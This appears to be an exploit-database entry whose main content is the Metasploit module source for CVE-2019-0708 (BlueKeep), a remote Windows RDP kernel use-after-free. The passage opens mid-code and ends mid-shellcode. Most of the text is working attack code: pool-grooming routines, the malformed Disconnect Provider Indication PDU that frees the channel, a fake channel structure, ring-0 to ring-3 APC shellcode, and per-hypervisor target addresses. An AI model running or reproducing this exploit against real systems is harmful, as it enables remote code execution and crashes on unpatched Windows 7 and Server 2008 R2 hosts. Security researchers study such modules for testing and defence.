Moreover, there is no lock when calling KernelApcRoutine.\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\n;\n; VOID KernelApcRoutine(\n; IN PKAPC Apc,\n; IN PKNORMAL_ROUTINE *NormalRoutine,\n; IN PVOID *NormalContext,\n; IN PVOID *SystemArgument1,\n; IN PVOID *SystemArgument2)\nkernel_kapc_routine:\n push rbp\n push rbx\n push rdi\n push rsi\n push r15\n\n mov rbp, [r8] ; *NormalContext is our data area pointer\n\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\n push rdx\n pop rsi ; mov rsi, rdx\n mov rbx, r9\n\n ;======================================\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\n ;======================================\n xor eax, eax\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\n ; rdx is already address of baseAddr\n mov [rdx], rax ; baseAddr = 0\n mov ecx, eax\n not rcx ; ProcessHandle = -1\n mov r8, rax ; ZeroBits\n mov al, 0x40 ; eax = 0x40\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\n push rax ; MEM_COMMIT = 0x1000\n ; reuse r9 for address of RegionSize\n mov [r9], rax ; RegionSize = 0x1000\n sub rsp, 0x20 ; shadow stack\n mov edi, #{zwallocatevirtualmemory_hash}\n call win_api_direct\n add rsp, 0x30\n\n ; check error\n test eax, eax\n jnz _kernel_kapc_routine_exit\n\n ;======================================\n ; copy userland payload\n ;======================================\n mov rdi, [rsi]\n\n;--------------------------- HACK IN EGG USER ---------\n\n push rdi\n\n lea rsi, [rel shellcode_start]\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\n\n _find_user_egg_loop:\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _find_user_egg_loop\n\n _inner_find_user_egg_loop:\n inc rsi\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _inner_find_user_egg_loop\n\n pop rdi\n;--------------------------- END HACK EGG USER ------------\n\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\n\n rep movsb\n\n ;======================================\n ; find CreateThread address (in kernel32.dll)\n ;======================================\n mov rax, [rbp+#{data_peb_addr_offset}]\n mov rax, [rax + 0x18] ; PEB->Ldr\n mov rax, [rax + 0x20] ; InMemoryOrder list\n\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n ;mov rbx, rsi ; use rbx for iterating thread\n_find_kernel32_dll_loop:\n mov rax, [rax] ; first one always be executable\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\n ; offset 0x50 => is name\n ; offset 0x20 => is dllbase\n ;cmp word [rax+0x38], 0x40\n ;jne _find_kernel32_dll_loop\n cmp word [rax+0x48], 0x18\n jne _find_kernel32_dll_loop\n\n mov rdx, [rax+0x50]\n ; check only \"32\" because name might be lowercase or uppercase\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\n jnz _find_kernel32_dll_loop\n\n mov r15, [rax+0x20]\n mov edi, #{createthread_hash}\n call get_proc_addr\n\n ; save CreateThread address to SystemArgument1\n mov [rbx], rax\n\n_kernel_kapc_routine_exit:\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n ; restore IRQL to APC_LEVEL\n mov cl, 1\n mov cr8, rcx\n\n pop r15\n pop rsi\n pop rdi\n pop rbx\n pop rbp\n ret\n\nuserland_start_thread:\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\n xor ecx, ecx ; lpThreadAttributes = NULL\n push rcx ; lpThreadId = NULL\n push rcx ; dwCreationFlags = 0\n mov r9, rcx ; lpParameter = NULL\n lea r8, [rel userland_payload] ; lpStartAddr\n mov edx, ecx ; dwStackSize = 0\n sub rsp, 0x20\n call rax\n add rsp, 0x30\n ret\n\nuserland_payload:\n ^\n\n [\n KERNELMODE_EGG,\n assemble_with_fixups(asm)\n ].pack('<Qa*')\n end\n\n def create_free_trigger(chan_user_id, chan_id)\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\n # The extra bytes on the end of the body is what causes the bad things to happen\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\n end\n\n def create_exploit_channel_buffer(target_addr)\n overspray_addr = target_addr + 0x2000\n shellcode_vtbl = target_addr + HEADER_SIZE\n magic_value1 = overspray_addr + 0x810\n magic_value2 = overspray_addr + 0x48\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\n\n # first 0x38 bytes are used by DATA PDU packet\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\n [\n [\n # SystemResourceList (2 pointers, each 8 bytes)\n # Pointer to OWNER_ENTRY (8 bytes)\n # ActiveCount (SHORT, 2 bytes)\n # Flag (WORD, 2 bytes)\n # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\n magic_value2, # --------------------\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\n 0x0, # ActiveCount (SHORT, 2 bytes)\n 0x0, # Flag (WORD, 2 bytes)\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n 0x1F, # ClassOffset (DWORD, 4 bytes)\n 0x0, # bindStatus (DWORD, 4 bytes)\n 0x72, # lockCount1 (QWORD, 8 bytes)\n magic_value3, # connection (QWORD, 8 bytes)\n shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)\n 0x5, # channelClass (DWORD, 4 bytes)\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\n 0x1F, # channelIndex (DWORD, 4 bytes)\n magic_value1, # channels (QWORD, 8 bytes)\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\n magic_value1, # connResrouce (QWORD, 8 bytes)\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\n 0x7065656b, # dword15C (DWORD, 4 bytes)\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\n ].join('')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb"}, {"lastseen": "2020-10-13T17:01:07", "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set! If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the GROOMBASE option.\n", "published": "2019-09-19T11:05:08", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Exploitation and Caveats from zerosum0x0:\n#\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\n# 4. RDP has chunked messages, so we use this to groom.\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\n# i. RDPSND only works when\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\n# ii. This registry key is not a default setting for server 2008 R2.\n# We should use alternate groom channels or at least detect the\n# channel in advance.\n# 5. Use chunked grooming to fit new data in the freed channel, account for\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\n# the \"call [rax]\" gadget will get its pointer from.\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\n# i. Hot-swap memory is another problem because, with certain VMWare and\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\n# start. This can be anywhere from 100 mb to gigabytes of offset\n# before the NPP start.\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\n# indirect call\n# d. We are limited to 0x400 payloads by channel chunk max size. My\n# current shellcode is a twin shellcode with eggfinders. I spam the\n# kernel payload and user payload, and if user payload is called first it\n# will egghunt for the kernel payload.\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\n# trigger the free by closing the socket.\n#\n# TODO:\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\n# * Write the XP/2003 portions grooming MS_T120.\n# * Detect if RDPSND grooming is working or not?\n# * Expand channels besides RDPSND/MS_T120 for grooming.\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\n#\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\n# MS_T120 on XP... should be same process as the RDPSND\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking\n\n USERMODE_EGG = 0xb00dac0fefe31337\n KERNELMODE_EGG = 0xb00dac0fefe42069\n\n CHUNK_SIZE = 0x400\n HEADER_SIZE = 0x48\n\n include Msf::Exploit::Remote::RDP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\n 'Description' => %q(\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.\n ),\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit\n 'Ryan Hanson', # @ryHanson - Original exploit\n 'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module\n 'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-0708'],\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\n ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']\n ],\n 'DefaultOptions' =>\n {\n 'RDP_CLIENT_NAME' => 'ethdev',\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Automatic targeting via fingerprinting',\n {\n 'Arch' => [ARCH_X64],\n 'FingerprintOnly' => true\n },\n ],\n #\n #\n # Windows 2008 R2 requires the following registry change from default:\n #\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\n # \"fDisableCam\"=dword:00000000\n #\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8003800000,\n 'GROOMSIZE' => 100\n }\n ],\n [\n # This works with Virtualbox 6\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8002407000\n }\n ],\n [\n # This address works on VMWare 14\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8030c00000\n }\n ],\n [\n # This address works on VMWare 15\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018C00000\n }\n ],\n [\n # This address works on VMWare 15.1\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8102407000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8004428000\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-05-14',\n 'Notes' =>\n {\n 'AKA' => ['Bluekeep']\n }\n ))\n\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\n OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])\n ]\n )\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n if target['FingerprintOnly']\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !')\n end\n\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n is_rdp, server_selected_proto = rdp_check_protocol\n unless is_rdp\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us\n # from exploiting the target.\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n end\n\n chans = [\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ]\n\n @mst120_chan_id = 1004 + chans.length - 1\n\n unless rdp_negotiate_security(chans, server_selected_proto)\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\n end\n\n rdp_establish_session\n\n rdp_dispatch_loop\n end\n\nprivate\n\n # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is\n # received on a channel, and this is when we need to kick off our exploit.\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\n # We have to do the default behaviour first.\n super(pkt, user, chan_id, flags, data)\n\n groom_size = datastore['GROOMSIZE']\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\n\n payloads = create_payloads(pool_addr)\n\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\n\n target_channel_id = chan_id + 1\n\n spray_buffer = create_exploit_channel_buffer(pool_addr)\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\n\n # if the exploit is cancelled during the free, target computer will explode\n print_warning(\"<---------------- | Entering Danger Zone | ---------------->\")\n\n print_status(\"Surfing channels ...\")\n rdp_send(spray_channel * 1024)\n rdp_send(free_trigger)\n\n chan_surf_size = 0x421\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\n chan_surf_packet = spray_channel * spray_packets\n chan_surf_count = chan_surf_size / spray_packets\n\n chan_surf_count.times do\n rdp_send(chan_surf_packet)\n end\n\n print_status(\"Lobbing eggs ...\")\n\n groom_mb = groom_size * 1024 / payloads.length\n\n groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n\n groom_mb.times do |current_groom_count|\n tpkts = ''\n for c in 0..groom_chan_count\n payloads.each do |p|\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\n end\n end\n rdp_send(tpkts)\n\n # tasks we do every 1 MB\n if current_groom_count % (1024 / payloads.length) == 0\n\n # adding mouse move events keeps the connection alive\n # (this handles a groom duration > 30 seconds, such as over Internet/VPN)\n rdp_move_mouse\n\n # simulate slow connection if GROOMDELAY is set\n if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0\n sleep(datastore['GROOMDELAY'])\n end\n\n groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n groom_elapsed_time = groom_current_time - groom_start_time\n groom_elapsed_str = \"%02d:%02d:%02d\" % [groom_elapsed_time / 3600,\n groom_elapsed_time / 60%60,\n groom_elapsed_time % 60]\n\n groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1\n vprint_status(\"Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})\")\n end\n end\n\n # Terminating and disconnecting forces the USE\n print_status(\"Forcing the USE of FREE'd object ...\")\n\n # target is groomed, the early cancellation dangers are complete\n print_warning(\"<---------------- | Leaving Danger Zone | ---------------->\")\n rdp_terminate\n rdp_disconnect\n end\n\n # Helper function to create the kernel mode payload and the usermode payload with\n # the egg hunter prefix.\n def create_payloads(pool_address)\n begin\n [kernel_mode_payload, user_mode_payload].map { |p|\n [\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\n p\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\n }\n rescue => ex\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\n end\n end\n\n def assemble_with_fixups(asm)\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\n # not grok that syntax.\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\n asm.gsub!(lea_rel) do |match|\n match = \"lea #{$1}, [rip + #{$2}]\"\n end\n\n # metasm encodes all rep instructions as repnz\n # https://github.com/jjyg/metasm/pull/40\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4')\n\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\n\n # Fixup above rewritten instructions with the relative label offsets\n encoded.reloc.each do |offset, reloc|\n target = reloc.target.to_s\n if encoded.export.key?(target)\n # Note: this assumes the address we're fixing up is at the end of the\n # instruction. This holds for 'lea' but if there are other fixups\n # later, this might need to change to account for specific instruction\n # encodings\n if reloc.type == :i32\n instr_offset = offset + 4\n elsif reloc.type == :i16\n instr_offset = offset + 2\n end\n encoded.fixup(target => encoded.export[target] - instr_offset)\n else\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\n end\n end\n encoded.fill\n encoded.data\n end\n\n # The user mode payload has two parts. The first is an egg hunter that searches for\n # the kernel mode payload. The second part is the actual payload that's invoked in\n # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel\n # and user mode payloads around the heap in different packets because we don't have\n # enough space to put them both in the same chunk. Given that code exec can result in\n # landing on the user land payload, the egg is used to go to a kernel payload.\n def user_mode_payload\n\n asm = %Q^\n_start:\n lea rcx, [rel _start]\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\n_egg_loop:\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\n mov rdx, [rcx - 8]\n cmp rdx, r8\n jnz _egg_loop\n jmp rcx\n ^\n egg_loop = assemble_with_fixups(asm)\n\n # The USERMODE_EGG is required at the start as well, because the exploit code\n # assumes the tag is there, and jumps over it to find the shellcode.\n [\n USERMODE_EGG,\n egg_loop,\n USERMODE_EGG,\n payload.raw\n ].pack('<Qa*<Qa*')\n end\n\n def kernel_mode_payload\n\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\n #\n # This shellcode was written originally for eternalblue exploits\n # eternalblue_exploit7.py and eternalblue_exploit8.py\n #\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\n #\n # Note:\n # - The userland shellcode is run in a new thread of system process.\n # If userland shellcode causes any exception, the system process get killed.\n # - On idle target with multiple core processors, the hijacked system call\n # might take a while (> 5 minutes) to get called because the system\n # call may be called on other processors.\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\n # This is ok because some Windows functions do not require a shadow stack.\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\n # Note: the Windows 8 version macros are removed below\n # - The userland payload MUST be appened to this shellcode.\n #\n # References:\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\n\n data_kapc_offset = 0x30\n\n data_hal_original_syscall_shadow_common_offset_offset = 0x20\n data_hal_fake_syscall_spinlock_offset = 0x10\n\n data_nt_kernel_addr_offset = 0x8\n data_origin_syscall_offset = 0\n data_peb_addr_offset = -0x10\n data_queueing_kapc_offset = -0x8\n hal_heap_storage = 0xffffffffffd04100\n\n # These hashes are not the same as the ones used by the\n # Block API so they have to be hard-coded.\n createthread_hash = 0x835e515e\n keinitializeapc_hash = 0x6d195cc4\n keinsertqueueapc_hash = 0xafcc4634\n psgetcurrentprocess_hash = 0xdbf47c78\n psgetprocessid_hash = 0x170114e1\n psgetprocessimagefilename_hash = 0x77645f3f\n psgetprocesspeb_hash = 0xb818b848\n psgetthreadteb_hash = 0xcef84c3e\n spoolsv_exe_hash = 0x3ee083d8\n zwallocatevirtualmemory_hash = 0x576e99ea\n\n asm = %Q^\nshellcode_start:\n ; egg tag\n nop\n nop\n nop\n nop\n\nsetup_syscall_shadow_hook:\n ; IRQL is PASSIVE_LEVEL when got code execution\n ;int 0x3\n\n mov rbp, #{hal_heap_storage}\n\n ; allow interrupts while executing shellcode\n sti\n call r3_to_r0_start\n cli\n\n ;--------------------- HACK crappy thread cleanup --------------------\n ; This code is effectively the same as the epilogue of the function that calls\n ; the vulnerable function in the kernel, with a tweak or two.\n ; TODO: make the lock not suck!!\n mov rax, qword [gs:0x188]\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\n lea r11, [rsp+0b8h]\n xor eax, eax\n mov rbx, [r11+30h]\n mov rbp, [r11+40h]\n mov rsi, [r11+48h]\n mov rsp, r11\n pop r15\n pop r14\n pop r13\n pop r12\n pop rdi\n ret\n\nr3_to_r0_start:\n ; save used non-volatile registers\n push r15\n push r14\n push rdi\n push rsi\n push rbx\n push rax ; align stack by 0x10\n\n ;======================================\n ; find nt kernel address\n ;======================================\n mov r15, qword [gs:0x38] ; get IdtBase of KPCR\n mov r15, qword [r15 + 0x4] ; get ISR address\n shr r15, 0xc ; strip to page size\n shl r15, 0xc\n\n_x64_find_nt_walk_page:\n sub r15, 0x1000 ; walk along page size\n cmp word [r15], 0x5a4d ; 'MZ' header\n jne _x64_find_nt_walk_page\n\n ; save nt address for using in KernelApcRoutine\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\n\n ;======================================\n ; get current EPROCESS and ETHREAD\n ;======================================\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\n mov edi, #{psgetcurrentprocess_hash}\n call win_api_direct\n xchg rcx, rax ; rcx = EPROCESS\n\n ; r15 : nt kernel address\n ; r14 : ETHREAD\n ; rcx : EPROCESS\n\n ;======================================\n ; find offset of EPROCESS.ImageFilename\n ;======================================\n mov 